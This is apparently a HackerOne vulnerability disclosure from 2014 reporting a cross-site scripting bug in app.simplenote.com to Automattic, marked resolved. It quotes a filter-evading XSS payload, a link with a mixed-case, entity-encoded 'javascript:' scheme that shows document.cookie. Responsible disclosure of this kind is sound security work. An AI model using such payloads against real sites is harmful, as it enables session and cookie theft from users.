xss in app.simplenote.com

Disclosed: 2014-07-08 10:00:28 By jcamacho To automattic

Unknown

Vulnerability Details

Hello Automattic, I found xss here app.simplenote.com __XSS Payload:__ <a href="jAvAsCrIpT&colon;prompt(document.cookie)">CLICK ME TO PROMPT</a> __Proof of Concept:__ http://i.imgur.com/8Ai0deF.png __Thanks,__ Jerold Camacho

Actions

View on HackerOne

Report Stats

Report ID: 13703
State: Closed
Substate: resolved
Upvotes: 2

xss in app.simplenote.com

Vulnerability Details

Actions

Report Stats

Share this report